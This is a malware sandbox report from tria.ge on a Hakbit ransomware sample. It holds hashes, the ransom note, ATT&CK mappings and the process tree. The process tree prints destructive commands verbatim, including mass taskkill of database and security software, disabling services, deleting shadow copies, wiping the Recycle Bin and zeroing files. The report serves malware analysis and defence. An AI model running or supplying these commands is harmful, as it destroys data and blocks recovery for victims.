Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

69c56d12ed...6b.exe

windows7-x64

10

69c56d12ed...6b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    23/01/2025, 02:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

  • Size

    80KB

  • MD5

    8152a3d0d76f7e968597f4f834fdfa9d

  • SHA1

    c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e

  • SHA256

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

  • SHA512

    eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

  • SSDEEP

    1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score
10/10
hakbitcredential_accessdefense_evasiondiscoveryexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below [email protected] Key Identifier: S/XkYGnuRXS0FbMwiRBKLY0EqvKaSltPGSHaCyXbc08BwBfeutGvXpEpLnePncCtFXU16kXFf+IP/DPq2LwcC1BA1CQsHzxK7Jb/K7nWtwd3Pvs56BN/pvSmQwqEYig4N23jLQ3ajjs9OGHq3pGKhbE719Dr6oZDR2FlDZE05AlRzwN019SIiyCt1YldlnjgvSzCMSvDqdepZxcDl+6jJZk5SkzNKBgj+dv8MLdKY3HpyzWMXRIkszjFppPjP4nPuHggoGVbEK1VLjjmyTm63AMe6k16DETXyzKNM6QwQMg3ic9DsN9I2EK639q6O2QRq85BhG6rQFsPuFv1upaSkz6D+wrAvg3yxhq9D/E/QKQtja8YjhHRq5xMuvJ3GAq+TdYyv0QAgw+65t2MHLGMBi8xEaah86GXcvecvfZhtRm7q3RzZ3/DuxGw1zCc+3hDJYMwL8URM13mZRQDWK9yUejFWvTbnvfONpbxDQa4/tTaJ1vLZeETKHRean5xXUymaKa7jNGeWYVTJ1aq6vk7p23WUCzAU6i/xHaXZo0EJgKMVmRLWNp7U6z+Sz9tj9UGk2HwrYWYpc+rnzE3t9oT97S5jRfE/eT9M1gH9ewWmd5qx2SzrQqbo2nhLxf7VwrCz1RHYN0uCVERRNWmsQw/AqAT7oMJ/2+GyPhs0MpeZfA= Number of files that were processed is: 468

Signatures

  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

    ransomwarehakbit
  • Hakbit family
    hakbit
  • Renames multiple (53) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 47 IoCs
    defense_evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      2⤵
        PID:2592
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLTELEMETRY start= disabled
        2⤵
        • Launches sc.exe
        PID:1236
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
        2⤵
        • Launches sc.exe
        PID:2560
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLWriter start= disabled
        2⤵
        • Launches sc.exe
        PID:796
      • C:\Windows\system32\sc.exe
        "sc.exe" config SstpSvc start= disabled
        2⤵
        • Launches sc.exe
        PID:2364
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2352
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqbcoreservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM firefoxconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM agntsvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2464
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM thebat.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM steam.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM encsvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM excel.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2864
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM CNTAoSMgr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlwriter.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2860
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM tbirdconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM dbeng50.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM thebat64.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2480
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocomm.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1752
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM infopath.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mbamtray.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2284
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM zoolz.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" IM thunderbird.exe /F
        2⤵
        • Kills process with taskkill
        PID:2688
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM dbsnmp.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM xfssvccon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2772
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM Ntrtscan.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM isqlplussvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM onenote.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM PccNTMon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM msaccess.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM outlook.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1732
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM tmlisten.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2152
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM msftesql.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM powerpnt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1464
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM visio.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1284
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM winword.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld-nt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM wordpad.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld-opt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocautoupds.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocssd.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM oracle.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:840
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlagent.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlbrowser.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlservr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1560
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM synctime.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1172
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2664
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        PID:844
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.7 -n 3
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2248
        • C:\Windows\system32\fsutil.exe
          fsutil file setZeroData offset=0 length=524288 “%s”
          3⤵
            PID:3216
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
          2⤵
          • Deletes itself
          PID:2960
          • C:\Windows\system32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:1636

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        System Services

        1
        T1569

        Service Execution

        1
        T1569.002

        Persistence

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Privilege Escalation

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Defense Evasion

        Credential Access

        Credentials from Password Stores

        2
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Windows Credential Manager

        1
        T1555.004

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Browser Information Discovery

        1
        T1217

        Remote System Discovery

        1
        T1018

        System Information Discovery

        1
        T1082

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Exfiltration

        Impact

        Service Stop

        1
        T1489

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck.energy[[email protected]]
          Filesize

          4KB

          MD5

          389e4c07e4fe5e3b9cff23f1c40d79e8

          SHA1

          ab0e7cf9f799f7cbf6986aa7d8520d7ea95c68e8

          SHA256

          a1e8d5c078cd08305e140d78b6b9f0868fa9b1ff219ffd914f8ef680963bf8f6

          SHA512

          fa8eca41c70679814c1b6fa9501f53863b1d8b3f7a3b8c647a90406a87a52a42f925ffe68e8bd455e70bc52a7fe1f0640467c562a3a0913a39fa0df7c835aff5

          Download Submit

        • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]
          Filesize

          180KB

          MD5

          effa57af7b66fa8ad077ece4924244e1

          SHA1

          6cd9dd92eb0249d18d11c64bf216c2c3edf7b542

          SHA256

          4327d8bf4d96705c57582eda5a50657a6627b53718e586c7764d3409bb1975f0

          SHA512

          8a60d55c5b29cd22c57db539be4b4a981c6d6b56aa1412f88113c42118223a9d730acdcfadcab529d3fb2213ff0c40ada6e3fc676b934f86fc42ab17717315b7

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          67ff76385e2e15edbe06b2dc421b391a

          SHA1

          de1dd541e77a58df23603412681eda05e5cec9f3

          SHA256

          f225cab4cfc06724a3cbe9761c85ebce12659b92af8dd0b53c6494ef87ae6b05

          SHA512

          576271f8e901ae3ffe819d7bfc10522f195df8e14a9edc7c68293fd8282c446839405a33a371f00ad3c8cb27f8fb515a4cef41f4b03c1dd8aaa080829a5e2a6c

          Download Submit

        • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
          Filesize

          828B

          MD5

          084d35f9c4e972ede81a28c700f13112

          SHA1

          dccdc35479ad6c2fc96ee184866e6088d57915c5

          SHA256

          230699358af8fa506abd672d55f9c89de27bfab0adb371738fb345a24b336a6b

          SHA512

          bae536710ff25391715ad4ecb660f999bab3f4d9adb5d44548908d918394b60cf352891e68b2f7c029771c7690bcd418d72b4e47bbea94336c7c0ec68640325f

          Download Submit

        • C:\Users\Admin\Desktop\OpenBackup.xlsx.energy[[email protected]]
          Filesize

          16KB

          MD5

          9da97f78624798f4fa31f2909daf4d93

          SHA1

          889a0e0f1252a86e689d21590dcfc5f4bce65c13

          SHA256

          a59e417ddea17a506a6499ab5c83da97c7056e9b5aeb5f709e51c915b71106d2

          SHA512

          74db5a5b4cdb8fe92970c71f2dd1a11524241883ece126e5d63a05b5c88c055b03920b0b5e1ab4a9e69a0fe0951c3a5cea0b8b641a9915ba1c6b17bcb90b6f8c

          Download Submit

        • memory/1072-8-0x000000001B580000-0x000000001B862000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1072-9-0x0000000002990000-0x0000000002998000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2124-278-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2124-0-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2124-311-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2124-3-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2124-1-0x0000000000D70000-0x0000000000D8A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2124-575-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

          Download